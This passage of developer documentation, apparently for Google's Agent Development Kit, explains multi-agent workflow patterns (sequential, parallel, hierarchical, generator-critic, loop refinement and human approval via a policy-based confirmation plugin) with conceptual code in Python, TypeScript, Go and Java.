const reporter = new LlmAgent({name: 'ReportResult', instruction: 'Report the result from {result}.'});

const dataPipeline = new SequentialAgent({
  name: 'DataPipeline',
  subAgents: [validator, processor, reporter]
});
// validator runs -> saves to state['validation_status']
// processor runs -> reads state['validation_status'], saves to state['result']
// reporter runs -> reads state['result']
```

```go
import (
    "google.golang.org/adk/agent"
    "google.golang.org/adk/agent/llmagent"
    "google.golang.org/adk/agent/workflowagents/sequentialagent"
)

// Conceptual Code: Sequential Data Pipeline
validator, _ := llmagent.New(llmagent.Config{Name: "ValidateInput", Instruction: "Validate the input.", OutputKey: "validation_status", Model: m})
processor, _ := llmagent.New(llmagent.Config{Name: "ProcessData", Instruction: "Process data if {validation_status} is 'valid'.", OutputKey: "result", Model: m})
reporter, _ := llmagent.New(llmagent.Config{Name: "ReportResult", Instruction: "Report the result from {result}.", Model: m})

dataPipeline, _ := sequentialagent.New(sequentialagent.Config{
    AgentConfig: agent.Config{Name: "DataPipeline", SubAgents: []agent.Agent{validator, processor, reporter}},
})
// validator runs -> saves to state["validation_status"]
// processor runs -> reads state["validation_status"], saves to state["result"]
// reporter runs -> reads state["result"]
```

```java
// Conceptual Code: Sequential Data Pipeline
import com.google.adk.agents.LlmAgent;
import com.google.adk.agents.SequentialAgent;

LlmAgent validator = LlmAgent.builder()
    .name("ValidateInput")
    .instruction("Validate the input")
    .outputKey("validation_status") // Saves its main text output to session.state["validation_status"]
    .build();

LlmAgent processor = LlmAgent.builder()
    .name("ProcessData")
    .instruction("Process data if {validation_status} is 'valid'")
    .outputKey("result") // Saves its main text output to session.state["result"]
    .build();

LlmAgent reporter = LlmAgent.builder()
    .name("ReportResult")
    .instruction("Report the result from {result}")
    .build();

SequentialAgent dataPipeline = SequentialAgent.builder()
    .name("DataPipeline")
    .subAgents(validator, processor, reporter)
    .build();

// validator runs -> saves to state['validation_status']
// processor runs -> reads state['validation_status'], saves to state['result']
// reporter runs -> reads state['result']
```

### Parallel Fan-Out/Gather Pattern

- **Structure:** A [`ParallelAgent`](https://google.github.io/adk-docs/agents/workflow-agents/parallel-agents/index.md) runs multiple `sub_agents` concurrently, often followed by a later agent (in a `SequentialAgent`) that aggregates results.
- **Goal:** Execute independent tasks simultaneously to reduce latency, then combine their outputs.
- **ADK Primitives Used:**
    - **Workflow:** `ParallelAgent` for concurrent execution (Fan-Out). Often nested within a `SequentialAgent` to handle the subsequent aggregation step (Gather).
    - **Communication:** Sub-agents write results to distinct keys in **Shared Session State**. The subsequent "Gather" agent reads multiple state keys.

```python
# Conceptual Code: Parallel Information Gathering
from google.adk.agents import SequentialAgent, ParallelAgent, LlmAgent

fetch_api1 = LlmAgent(name="API1Fetcher", instruction="Fetch data from API 1.", output_key="api1_data")
fetch_api2 = LlmAgent(name="API2Fetcher", instruction="Fetch data from API 2.", output_key="api2_data")

gather_concurrently = ParallelAgent(
    name="ConcurrentFetch",
    sub_agents=[fetch_api1, fetch_api2]
)

synthesizer = LlmAgent(
    name="Synthesizer",
    instruction="Combine results from {api1_data} and {api2_data}."
)

overall_workflow = SequentialAgent(
    name="FetchAndSynthesize",
    sub_agents=[gather_concurrently, synthesizer] # Run parallel fetch, then synthesize
)
# fetch_api1 and fetch_api2 run concurrently, saving to state.
# synthesizer runs afterwards, reading state['api1_data'] and state['api2_data'].
```

```typescript
// Conceptual Code: Parallel Information Gathering
import { SequentialAgent, ParallelAgent, LlmAgent } from '@google/adk';

const fetchApi1 = new LlmAgent({name: 'API1Fetcher', instruction: 'Fetch data from API 1.', outputKey: 'api1_data'});
const fetchApi2 = new LlmAgent({name: 'API2Fetcher', instruction: 'Fetch data from API 2.', outputKey: 'api2_data'});

const gatherConcurrently = new ParallelAgent({
  name: 'ConcurrentFetch',
  subAgents: [fetchApi1, fetchApi2]
});

const synthesizer = new LlmAgent({
  name: 'Synthesizer',
  instruction: 'Combine results from {api1_data} and {api2_data}.'
});

const overallWorkflow = new SequentialAgent({
  name: 'FetchAndSynthesize',
  subAgents: [gatherConcurrently, synthesizer] // Run parallel fetch, then synthesize
});
// fetchApi1 and fetchApi2 run concurrently, saving to state.
// synthesizer runs afterwards, reading state['api1_data'] and state['api2_data'].
```

```go
import (
    "google.golang.org/adk/agent"
    "google.golang.org/adk/agent/llmagent"
    "google.golang.org/adk/agent/workflowagents/parallelagent"
    "google.golang.org/adk/agent/workflowagents/sequentialagent"
)

// Conceptual Code: Parallel Information Gathering
fetchAPI1, _ := llmagent.New(llmagent.Config{Name: "API1Fetcher", Instruction: "Fetch data from API 1.", OutputKey: "api1_data", Model: m})
fetchAPI2, _ := llmagent.New(llmagent.Config{Name: "API2Fetcher", Instruction: "Fetch data from API 2.", OutputKey: "api2_data", Model: m})

gatherConcurrently, _ := parallelagent.New(parallelagent.Config{
    AgentConfig: agent.Config{Name: "ConcurrentFetch", SubAgents: []agent.Agent{fetchAPI1, fetchAPI2}},
})

synthesizer, _ := llmagent.New(llmagent.Config{Name: "Synthesizer", Instruction: "Combine results from {api1_data} and {api2_data}.", Model: m})

overallWorkflow, _ := sequentialagent.New(sequentialagent.Config{
    AgentConfig: agent.Config{Name: "FetchAndSynthesize", SubAgents: []agent.Agent{gatherConcurrently, synthesizer}},
})
// fetchAPI1 and fetchAPI2 run concurrently, saving to state.
// synthesizer runs afterwards, reading state["api1_data"] and state["api2_data"].
```

```java
// Conceptual Code: Parallel Information Gathering
import com.google.adk.agents.LlmAgent;
import com.google.adk.agents.ParallelAgent;
import com.google.adk.agents.SequentialAgent;

LlmAgent fetchApi1 = LlmAgent.builder()
    .name("API1Fetcher")
    .instruction("Fetch data from API 1.")
    .outputKey("api1_data")
    .build();

LlmAgent fetchApi2 = LlmAgent.builder()
    .name("API2Fetcher")
    .instruction("Fetch data from API 2.")
    .outputKey("api2_data")
    .build();

ParallelAgent gatherConcurrently = ParallelAgent.builder()
    .name("ConcurrentFetcher")
    .subAgents(fetchApi2, fetchApi1)
    .build();

LlmAgent synthesizer = LlmAgent.builder()
    .name("Synthesizer")
    .instruction("Combine results from {api1_data} and {api2_data}.")
    .build();

SequentialAgent overallWorkflow = SequentialAgent.builder()
    .name("FetchAndSynthesize") // Run parallel fetch, then synthesize
    .subAgents(gatherConcurrently, synthesizer)
    .build();

// fetchApi1 and fetchApi2 run concurrently, saving to state.
// synthesizer runs afterwards, reading state['api1_data'] and state['api2_data'].
```

### Hierarchical Task Decomposition

- **Structure:** A multi-level tree of agents where higher-level agents break down complex goals and delegate sub-tasks to lower-level agents.
- **Goal:** Solve complex problems by recursively breaking them down into simpler, executable steps.
- **ADK Primitives Used:**
    - **Hierarchy:** Multi-level `parent_agent`/`sub_agents` structure.
    - **Interaction:** Primarily **LLM-Driven Delegation** or **Explicit Invocation (`AgentTool`)** used by parent agents to assign tasks to sub-agents. Results are returned up the hierarchy (via tool responses or state).

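The shape of this pattern, where delegation goes down the tree and results come back up, can be shown with a small recursive model. This is a plain-Python sketch under stated assumptions, not ADK code: `Node` and `solve` are hypothetical, and string formatting stands in for the real work each agent would do.

```python
from dataclasses import dataclass, field
from typing import Callable, Optional


@dataclass
class Node:
    """Hypothetical agent node: leaves do work, parents delegate and combine."""
    name: str
    work: Optional[Callable[[str], str]] = None
    children: list = field(default_factory=list)

    def solve(self, task: str, trace: list) -> str:
        trace.append(self.name)  # record the order in which agents are invoked
        if not self.children:
            return self.work(task)
        # Delegate to each child, then combine their results on the way back up.
        parts = [child.solve(task, trace) for child in self.children]
        return f"{self.name}({', '.join(parts)})"


web_search = Node("WebSearch", work=lambda t: f"facts about {t}")
summarizer = Node("Summarizer", work=lambda t: f"summary of {t}")
assistant = Node("ResearchAssistant", children=[web_search, summarizer])
writer = Node("ReportWriter", children=[assistant])

trace: list = []
report = writer.solve("solar power", trace)
print(report)
print(trace)
```

The `trace` list makes the top-down call order visible, while the nested result string shows each level wrapping what its children returned.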
```python # Conceptual Code: Hierarchical Research Task from google.adk.agents import LlmAgent from google.adk.tools import agent_tool # Low-level tool-like agents web_searcher = LlmAgent(name="WebSearch", description="Performs web searches for facts.") summarizer = LlmAgent(name="Summarizer", description="Summarizes text.") # Mid-level agent combining tools research_assistant = LlmAgent( name="ResearchAssistant", model="gemini-2.0-flash", description="Finds and summarizes information on a topic.", tools=[agent_tool.AgentTool(agent=web_searcher), agent_tool.AgentTool(agent=summarizer)] ) # High-level agent delegating research report_writer = LlmAgent( name="ReportWriter", model="gemini-2.0-flash", instruction="Write a report on topic X. Use the ResearchAssistant to gather information.", tools=[agent_tool.AgentTool(agent=research_assistant)] # Alternatively, could use LLM Transfer if research_assistant is a sub_agent ) # User interacts with ReportWriter. # ReportWriter calls ResearchAssistant tool. # ResearchAssistant calls WebSearch and Summarizer tools. # Results flow back up. ``` ```typescript // Conceptual Code: Hierarchical Research Task import { LlmAgent, AgentTool } from '@google/adk'; // Low-level tool-like agents const webSearcher = new LlmAgent({name: 'WebSearch', description: 'Performs web searches for facts.'}); const summarizer = new LlmAgent({name: 'Summarizer', description: 'Summarizes text.'}); // Mid-level agent combining tools const researchAssistant = new LlmAgent({ name: 'ResearchAssistant', model: 'gemini-2.5-flash', description: 'Finds and summarizes information on a topic.', tools: [new AgentTool({agent: webSearcher}), new AgentTool({agent: summarizer})] }); // High-level agent delegating research const reportWriter = new LlmAgent({ name: 'ReportWriter', model: 'gemini-2.5-flash', instruction: 'Write a report on topic X. 
Use the ResearchAssistant to gather information.', tools: [new AgentTool({agent: researchAssistant})] // Alternatively, could use LLM Transfer if researchAssistant is a subAgent }); // User interacts with ReportWriter. // ReportWriter calls ResearchAssistant tool. // ResearchAssistant calls WebSearch and Summarizer tools. // Results flow back up. ``` ```go import ( "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/tool" "google.golang.org/adk/tool/agenttool" ) // Conceptual Code: Hierarchical Research Task // Low-level tool-like agents webSearcher, _ := llmagent.New(llmagent.Config{Name: "WebSearch", Description: "Performs web searches for facts.", Model: m}) summarizer, _ := llmagent.New(llmagent.Config{Name: "Summarizer", Description: "Summarizes text.", Model: m}) // Mid-level agent combining tools webSearcherTool := agenttool.New(webSearcher, nil) summarizerTool := agenttool.New(summarizer, nil) researchAssistant, _ := llmagent.New(llmagent.Config{ Name: "ResearchAssistant", Model: m, Description: "Finds and summarizes information on a topic.", Tools: []tool.Tool{webSearcherTool, summarizerTool}, }) // High-level agent delegating research researchAssistantTool := agenttool.New(researchAssistant, nil) reportWriter, _ := llmagent.New(llmagent.Config{ Name: "ReportWriter", Model: m, Instruction: "Write a report on topic X. Use the ResearchAssistant to gather information.", Tools: []tool.Tool{researchAssistantTool}, }) // User interacts with ReportWriter. // ReportWriter calls ResearchAssistant tool. // ResearchAssistant calls WebSearch and Summarizer tools. // Results flow back up. 
``` ```java // Conceptual Code: Hierarchical Research Task import com.google.adk.agents.LlmAgent; import com.google.adk.tools.AgentTool; // Low-level tool-like agents LlmAgent webSearcher = LlmAgent.builder() .name("WebSearch") .description("Performs web searches for facts.") .build(); LlmAgent summarizer = LlmAgent.builder() .name("Summarizer") .description("Summarizes text.") .build(); // Mid-level agent combining tools LlmAgent researchAssistant = LlmAgent.builder() .name("ResearchAssistant") .model("gemini-2.0-flash") .description("Finds and summarizes information on a topic.") .tools(AgentTool.create(webSearcher), AgentTool.create(summarizer)) .build(); // High-level agent delegating research LlmAgent reportWriter = LlmAgent.builder() .name("ReportWriter") .model("gemini-2.0-flash") .instruction("Write a report on topic X. Use the ResearchAssistant to gather information.") .tools(AgentTool.create(researchAssistant)) // Alternatively, could use LLM Transfer if research_assistant is a subAgent .build(); // User interacts with ReportWriter. // ReportWriter calls ResearchAssistant tool. // ResearchAssistant calls WebSearch and Summarizer tools. // Results flow back up. ``` ### Review/Critique Pattern (Generator-Critic) - **Structure:** Typically involves two agents within a [`SequentialAgent`](https://google.github.io/adk-docs/agents/workflow-agents/sequential-agents/index.md): a Generator and a Critic/Reviewer. - **Goal:** Improve the quality or validity of generated output by having a dedicated agent review it. - **ADK Primitives Used:** - **Workflow:** `SequentialAgent` ensures generation happens before review. - **Communication:** **Shared Session State** (Generator uses `output_key` to save output; Reviewer reads that state key). The Reviewer might save its feedback to another state key for subsequent steps. 
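The state hand-off described above can be illustrated in plain Python. This is a minimal sketch, not ADK's implementation: `render_instruction` and `run_step` are hypothetical helpers, and the lambdas stand in for model calls. It shows the two moves the pattern relies on: substituting `{key}` placeholders from a shared state dictionary, and writing each step's output back under its output key. Leaving unknown placeholders untouched is a choice made for this sketch only.

```python
import re
from typing import Callable, Dict


def render_instruction(template: str, state: Dict[str, str]) -> str:
    """Replace each {key} placeholder with state[key]; unknown keys are left as-is."""
    def substitute(match: re.Match) -> str:
        key = match.group(1)
        return state.get(key, match.group(0))
    return re.sub(r"\{(\w+)\}", substitute, template)


def run_step(instruction: str, output_key: str, state: Dict[str, str],
             fake_model: Callable[[str], str]) -> None:
    """Render the instruction, call the stand-in model, save the result to state."""
    prompt = render_instruction(instruction, state)
    state[output_key] = fake_model(prompt)


state: Dict[str, str] = {}

# Generator step: writes its draft to state["draft_text"].
run_step("Write a short paragraph about subject X.", "draft_text", state,
         fake_model=lambda prompt: "X was discovered in 1900.")

# Critic step: its instruction reads the draft via the {draft_text} placeholder.
run_step("Review the text in {draft_text} for factual accuracy.", "review_status", state,
         fake_model=lambda prompt: "valid" if "1900" in prompt else "invalid")

print(state)
```

Because the critic only sees the draft through the rendered prompt, the generator and critic stay decoupled: either one can be swapped out as long as the state keys stay the same.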
```python # Conceptual Code: Generator-Critic from google.adk.agents import SequentialAgent, LlmAgent generator = LlmAgent( name="DraftWriter", instruction="Write a short paragraph about subject X.", output_key="draft_text" ) reviewer = LlmAgent( name="FactChecker", instruction="Review the text in {draft_text} for factual accuracy. Output 'valid' or 'invalid' with reasons.", output_key="review_status" ) # Optional: Further steps based on review_status review_pipeline = SequentialAgent( name="WriteAndReview", sub_agents=[generator, reviewer] ) # generator runs -> saves draft to state['draft_text'] # reviewer runs -> reads state['draft_text'], saves status to state['review_status'] ``` ```typescript // Conceptual Code: Generator-Critic import { SequentialAgent, LlmAgent } from '@google/adk'; const generator = new LlmAgent({ name: 'DraftWriter', instruction: 'Write a short paragraph about subject X.', outputKey: 'draft_text' }); const reviewer = new LlmAgent({ name: 'FactChecker', instruction: 'Review the text in {draft_text} for factual accuracy. Output "valid" or "invalid" with reasons.', outputKey: 'review_status' }); // Optional: Further steps based on review_status const reviewPipeline = new SequentialAgent({ name: 'WriteAndReview', subAgents: [generator, reviewer] }); // generator runs -> saves draft to state['draft_text'] // reviewer runs -> reads state['draft_text'], saves status to state['review_status'] ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/sequentialagent" ) // Conceptual Code: Generator-Critic generator, _ := llmagent.New(llmagent.Config{ Name: "DraftWriter", Instruction: "Write a short paragraph about subject X.", OutputKey: "draft_text", Model: m, }) reviewer, _ := llmagent.New(llmagent.Config{ Name: "FactChecker", Instruction: "Review the text in {draft_text} for factual accuracy. 
Output 'valid' or 'invalid' with reasons.", OutputKey: "review_status", Model: m, }) reviewPipeline, _ := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{Name: "WriteAndReview", SubAgents: []agent.Agent{generator, reviewer}}, }) // generator runs -> saves draft to state["draft_text"] // reviewer runs -> reads state["draft_text"], saves status to state["review_status"] ``` ```java // Conceptual Code: Generator-Critic import com.google.adk.agents.LlmAgent; import com.google.adk.agents.SequentialAgent; LlmAgent generator = LlmAgent.builder() .name("DraftWriter") .instruction("Write a short paragraph about subject X.") .outputKey("draft_text") .build(); LlmAgent reviewer = LlmAgent.builder() .name("FactChecker") .instruction("Review the text in {draft_text} for factual accuracy. Output 'valid' or 'invalid' with reasons.") .outputKey("review_status") .build(); // Optional: Further steps based on review_status SequentialAgent reviewPipeline = SequentialAgent.builder() .name("WriteAndReview") .subAgents(generator, reviewer) .build(); // generator runs -> saves draft to state['draft_text'] // reviewer runs -> reads state['draft_text'], saves status to state['review_status'] ``` ### Iterative Refinement Pattern - **Structure:** Uses a [`LoopAgent`](https://google.github.io/adk-docs/agents/workflow-agents/loop-agents/index.md) containing one or more agents that work on a task over multiple iterations. - **Goal:** Progressively improve a result (e.g., code, text, plan) stored in the session state until a quality threshold is met or a maximum number of iterations is reached. - **ADK Primitives Used:** - **Workflow:** `LoopAgent` manages the repetition. - **Communication:** **Shared Session State** is essential for agents to read the previous iteration's output and save the refined version. 
- **Termination:** The loop typically ends based on `max_iterations` or a dedicated checking agent setting `escalate=True` in the `Event Actions` when the result is satisfactory. ```python # Conceptual Code: Iterative Code Refinement from google.adk.agents import LoopAgent, LlmAgent, BaseAgent from google.adk.events import Event, EventActions from google.adk.agents.invocation_context import InvocationContext from typing import AsyncGenerator # Agent to generate/refine code based on state['current_code'] and state['requirements'] code_refiner = LlmAgent( name="CodeRefiner", instruction="Read state['current_code'] (if exists) and state['requirements']. Generate/refine Python code to meet requirements. Save to state['current_code'].", output_key="current_code" # Overwrites previous code in state ) # Agent to check if the code meets quality standards quality_checker = LlmAgent( name="QualityChecker", instruction="Evaluate the code in state['current_code'] against state['requirements']. Output 'pass' or 'fail'.", output_key="quality_status" ) # Custom agent to check the status and escalate if 'pass' class CheckStatusAndEscalate(BaseAgent): async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]: status = ctx.session.state.get("quality_status", "fail") should_stop = (status == "pass") yield Event(author=self.name, actions=EventActions(escalate=should_stop)) refinement_loop = LoopAgent( name="CodeRefinementLoop", max_iterations=5, sub_agents=[code_refiner, quality_checker, CheckStatusAndEscalate(name="StopChecker")] ) # Loop runs: Refiner -> Checker -> StopChecker # State['current_code'] is updated each iteration. # Loop stops if QualityChecker outputs 'pass' (leading to StopChecker escalating) or after 5 iterations. 
```

```typescript
// Conceptual Code: Iterative Code Refinement
import { LoopAgent, LlmAgent, BaseAgent, InvocationContext, createEvent, createEventActions } from '@google/adk';
import type { Event } from '@google/adk';

// Agent to generate/refine code based on state['current_code'] and state['requirements']
const codeRefiner = new LlmAgent({
  name: 'CodeRefiner',
  instruction: 'Read state["current_code"] (if exists) and state["requirements"]. Generate/refine TypeScript code to meet requirements. Save to state["current_code"].',
  outputKey: 'current_code' // Overwrites previous code in state
});

// Agent to check if the code meets quality standards
const qualityChecker = new LlmAgent({
  name: 'QualityChecker',
  instruction: 'Evaluate the code in state["current_code"] against state["requirements"]. Output "pass" or "fail".',
  outputKey: 'quality_status'
});

// Custom agent to check the status and escalate if 'pass'
class CheckStatusAndEscalate extends BaseAgent {
  async *runAsyncImpl(ctx: InvocationContext): AsyncGenerator<Event, void, void> {
    const status = ctx.session.state.quality_status;
    const shouldStop = status === 'pass';
    if (shouldStop) {
      // Escalating signals the enclosing LoopAgent to stop iterating
      yield createEvent({
        author: 'StopChecker',
        actions: createEventActions({ escalate: true }),
      });
    }
  }

  async *runLiveImpl(ctx: InvocationContext): AsyncGenerator<Event, void, void> {
    // This agent doesn't have a live implementation
    yield createEvent({ author: 'StopChecker' });
  }
}

// Loop runs: Refiner -> Checker -> StopChecker
// State['current_code'] is updated each iteration.
// Loop stops if QualityChecker outputs 'pass' (leading to StopChecker escalating) or after 5 iterations.
const refinementLoop = new LoopAgent({ name: 'CodeRefinementLoop', maxIterations: 5, subAgents: [codeRefiner, qualityChecker, new CheckStatusAndEscalate({name: 'StopChecker'})] }); ``` ```go import ( "iter" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/loopagent" "google.golang.org/adk/session" ) // Conceptual Code: Iterative Code Refinement codeRefiner, _ := llmagent.New(llmagent.Config{ Name: "CodeRefiner", Instruction: "Read state['current_code'] (if exists) and state['requirements']. Generate/refine Python code to meet requirements. Save to state['current_code'].", OutputKey: "current_code", Model: m, }) qualityChecker, _ := llmagent.New(llmagent.Config{ Name: "QualityChecker", Instruction: "Evaluate the code in state['current_code'] against state['requirements']. Output 'pass' or 'fail'.", OutputKey: "quality_status", Model: m, }) checkStatusAndEscalate, _ := agent.New(agent.Config{ Name: "StopChecker", Run: func(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] { return func(yield func(*session.Event, error) bool) { status, _ := ctx.Session().State().Get("quality_status") shouldStop := status == "pass" yield(&session.Event{Author: "StopChecker", Actions: session.EventActions{Escalate: shouldStop}}, nil) } }, }) refinementLoop, _ := loopagent.New(loopagent.Config{ MaxIterations: 5, AgentConfig: agent.Config{Name: "CodeRefinementLoop", SubAgents: []agent.Agent{codeRefiner, qualityChecker, checkStatusAndEscalate}}, }) // Loop runs: Refiner -> Checker -> StopChecker // State["current_code"] is updated each iteration. // Loop stops if QualityChecker outputs 'pass' (leading to StopChecker escalating) or after 5 iterations. 
``` ```java // Conceptual Code: Iterative Code Refinement import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.agents.LoopAgent; import com.google.adk.events.Event; import com.google.adk.events.EventActions; import com.google.adk.agents.InvocationContext; import io.reactivex.rxjava3.core.Flowable; import java.util.List; // Agent to generate/refine code based on state['current_code'] and state['requirements'] LlmAgent codeRefiner = LlmAgent.builder() .name("CodeRefiner") .instruction("Read state['current_code'] (if exists) and state['requirements']. Generate/refine Java code to meet requirements. Save to state['current_code'].") .outputKey("current_code") // Overwrites previous code in state .build(); // Agent to check if the code meets quality standards LlmAgent qualityChecker = LlmAgent.builder() .name("QualityChecker") .instruction("Evaluate the code in state['current_code'] against state['requirements']. Output 'pass' or 'fail'.") .outputKey("quality_status") .build(); BaseAgent checkStatusAndEscalate = new BaseAgent( "StopChecker","Checks quality_status and escalates if 'pass'.", List.of(), null, null) { @Override protected Flowable runAsyncImpl(InvocationContext invocationContext) { String status = (String) invocationContext.session().state().getOrDefault("quality_status", "fail"); boolean shouldStop = "pass".equals(status); EventActions actions = EventActions.builder().escalate(shouldStop).build(); Event event = Event.builder() .author(this.name()) .actions(actions) .build(); return Flowable.just(event); } }; LoopAgent refinementLoop = LoopAgent.builder() .name("CodeRefinementLoop") .maxIterations(5) .subAgents(codeRefiner, qualityChecker, checkStatusAndEscalate) .build(); // Loop runs: Refiner -> Checker -> StopChecker // State['current_code'] is updated each iteration. // Loop stops if QualityChecker outputs 'pass' (leading to StopChecker escalating) or after 5 // iterations. 
``` ### Human-in-the-Loop Pattern - **Structure:** Integrates human intervention points within an agent workflow. - **Goal:** Allow for human oversight, approval, correction, or tasks that AI cannot perform. - **ADK Primitives Used (Conceptual):** - **Interaction:** Can be implemented using a custom **Tool** that pauses execution and sends a request to an external system (e.g., a UI, ticketing system) waiting for human input. The tool then returns the human's response to the agent. - **Workflow:** Could use **LLM-Driven Delegation** (`transfer_to_agent`) targeting a conceptual "Human Agent" that triggers the external workflow, or use the custom tool within an `LlmAgent`. - **State/Callbacks:** State can hold task details for the human; callbacks can manage the interaction flow. - **Note:** ADK doesn't have a built-in "Human Agent" type, so this requires custom integration. ```python # Conceptual Code: Using a Tool for Human Approval from google.adk.agents import LlmAgent, SequentialAgent from google.adk.tools import FunctionTool # --- Assume external_approval_tool exists --- # This tool would: # 1. Take details (e.g., request_id, amount, reason). # 2. Send these details to a human review system (e.g., via API). # 3. Poll or wait for the human response (approved/rejected). # 4. Return the human's decision. # async def external_approval_tool(amount: float, reason: str) -> str: ... approval_tool = FunctionTool(func=external_approval_tool) # Agent that prepares the request prepare_request = LlmAgent( name="PrepareApproval", instruction="Prepare the approval request details based on user input. Store amount and reason in state.", # ... likely sets state['approval_amount'] and state['approval_reason'] ... 
) # Agent that calls the human approval tool request_approval = LlmAgent( name="RequestHumanApproval", instruction="Use the external_approval_tool with amount from state['approval_amount'] and reason from state['approval_reason'].", tools=[approval_tool], output_key="human_decision" ) # Agent that proceeds based on human decision process_decision = LlmAgent( name="ProcessDecision", instruction="Check {human_decision}. If 'approved', proceed. If 'rejected', inform user." ) approval_workflow = SequentialAgent( name="HumanApprovalWorkflow", sub_agents=[prepare_request, request_approval, process_decision] ) ``` ```typescript // Conceptual Code: Using a Tool for Human Approval import { LlmAgent, SequentialAgent, FunctionTool } from '@google/adk'; import { z } from 'zod'; // --- Assume externalApprovalTool exists --- // This tool would: // 1. Take details (e.g., request_id, amount, reason). // 2. Send these details to a human review system (e.g., via API). // 3. Poll or wait for the human response (approved/rejected). // 4. Return the human's decision. async function externalApprovalTool(params: {amount: number, reason: string}): Promise<{decision: string}> { // ... implementation to call external system return {decision: 'approved'}; // or 'rejected' } const approvalTool = new FunctionTool({ name: 'external_approval_tool', description: 'Sends a request for human approval.', parameters: z.object({ amount: z.number(), reason: z.string(), }), execute: externalApprovalTool, }); // Agent that prepares the request const prepareRequest = new LlmAgent({ name: 'PrepareApproval', instruction: 'Prepare the approval request details based on user input. Store amount and reason in state.', // ... likely sets state['approval_amount'] and state['approval_reason'] ... 
}); // Agent that calls the human approval tool const requestApproval = new LlmAgent({ name: 'RequestHumanApproval', instruction: 'Use the external_approval_tool with amount from state["approval_amount"] and reason from state["approval_reason"].', tools: [approvalTool], outputKey: 'human_decision' }); // Agent that proceeds based on human decision const processDecision = new LlmAgent({ name: 'ProcessDecision', instruction: 'Check {human_decision}. If "approved", proceed. If "rejected", inform user.' }); const approvalWorkflow = new SequentialAgent({ name: 'HumanApprovalWorkflow', subAgents: [prepareRequest, requestApproval, processDecision] }); ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/sequentialagent" "google.golang.org/adk/tool" ) // Conceptual Code: Using a Tool for Human Approval // --- Assume externalApprovalTool exists --- // func externalApprovalTool(amount float64, reason string) (string, error) { ... } type externalApprovalToolArgs struct { Amount float64 `json:"amount" jsonschema:"The amount for which approval is requested."` Reason string `json:"reason" jsonschema:"The reason for the approval request."` } var externalApprovalTool func(tool.Context, externalApprovalToolArgs) (string, error) approvalTool, _ := functiontool.New( functiontool.Config{ Name: "external_approval_tool", Description: "Sends a request for human approval.", }, externalApprovalTool, ) prepareRequest, _ := llmagent.New(llmagent.Config{ Name: "PrepareApproval", Instruction: "Prepare the approval request details based on user input. 
Store amount and reason in state.", Model: m, }) requestApproval, _ := llmagent.New(llmagent.Config{ Name: "RequestHumanApproval", Instruction: "Use the external_approval_tool with amount from state['approval_amount'] and reason from state['approval_reason'].", Tools: []tool.Tool{approvalTool}, OutputKey: "human_decision", Model: m, }) processDecision, _ := llmagent.New(llmagent.Config{ Name: "ProcessDecision", Instruction: "Check {human_decision}. If 'approved', proceed. If 'rejected', inform user.", Model: m, }) approvalWorkflow, _ := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{Name: "HumanApprovalWorkflow", SubAgents: []agent.Agent{prepareRequest, requestApproval, processDecision}}, }) ``` ```java // Conceptual Code: Using a Tool for Human Approval import com.google.adk.agents.LlmAgent; import com.google.adk.agents.SequentialAgent; import com.google.adk.tools.FunctionTool; // --- Assume external_approval_tool exists --- // This tool would: // 1. Take details (e.g., request_id, amount, reason). // 2. Send these details to a human review system (e.g., via API). // 3. Poll or wait for the human response (approved/rejected). // 4. Return the human's decision. // public boolean externalApprovalTool(float amount, String reason) { ... } FunctionTool approvalTool = FunctionTool.create(externalApprovalTool); // Agent that prepares the request LlmAgent prepareRequest = LlmAgent.builder() .name("PrepareApproval") .instruction("Prepare the approval request details based on user input. Store amount and reason in state.") // ... likely sets state['approval_amount'] and state['approval_reason'] ... 
.build(); // Agent that calls the human approval tool LlmAgent requestApproval = LlmAgent.builder() .name("RequestHumanApproval") .instruction("Use the external_approval_tool with amount from state['approval_amount'] and reason from state['approval_reason'].") .tools(approvalTool) .outputKey("human_decision") .build(); // Agent that proceeds based on human decision LlmAgent processDecision = LlmAgent.builder() .name("ProcessDecision") .instruction("Check {human_decision}. If 'approved', proceed. If 'rejected', inform user.") .build(); SequentialAgent approvalWorkflow = SequentialAgent.builder() .name("HumanApprovalWorkflow") .subAgents(prepareRequest, requestApproval, processDecision) .build(); ``` #### Human in the Loop with Policy A more advanced and structured way to implement Human-in-the-Loop is by using a `PolicyEngine`. This approach allows you to define policies that can trigger a confirmation step from a user before a tool is executed. The `SecurityPlugin` intercepts a tool call, consults the `PolicyEngine`, and if the policy dictates, it will automatically request user confirmation. This pattern is more robust for enforcing governance and security rules. Here's how it works: 1. **`SecurityPlugin`**: You add this plugin to your `Runner`. It acts as an interceptor for all tool calls. 1. **`BasePolicyEngine`**: You create a custom class that implements this interface. Its `evaluate()` method contains your logic to decide if a tool call needs confirmation. 1. **`PolicyOutcome.CONFIRM`**: When your `evaluate()` method returns this outcome, the `SecurityPlugin` pauses the tool execution and generates a special `FunctionCall` using `getAskUserConfirmationFunctionCalls`. 1. **Application Handling**: Your application code receives this special function call and presents the confirmation request to the user. 1. 
**User Confirmation**: Once the user confirms, your application sends a `FunctionResponse` back to the agent, which allows the `SecurityPlugin` to proceed with the original tool execution.

**TypeScript Recommended Pattern:** The policy-based pattern is the recommended approach for implementing Human-in-the-Loop workflows in TypeScript. Support in other ADK languages is planned for future releases.

A conceptual example of using a `CustomPolicyEngine` to require user confirmation before executing any tool is shown below.

```typescript
const rootAgent = new LlmAgent({
  name: 'weather_time_agent',
  model: 'gemini-2.5-flash',
  description: 'Agent to answer questions about the time and weather in a city.',
  instruction: 'You are a helpful agent who can answer user questions about the time and weather in a city.',
  tools: [getWeatherTool],
});

class CustomPolicyEngine implements BasePolicyEngine {
  async evaluate(_context: ToolCallPolicyContext) {
    // Require user confirmation for every tool call
    return {
      outcome: PolicyOutcome.CONFIRM,
      reason: 'Needs confirmation for tool call',
    };
  }
}

const runner = new InMemoryRunner({
  agent: rootAgent,
  appName,
  plugins: [new SecurityPlugin({policyEngine: new CustomPolicyEngine()})]
});
```

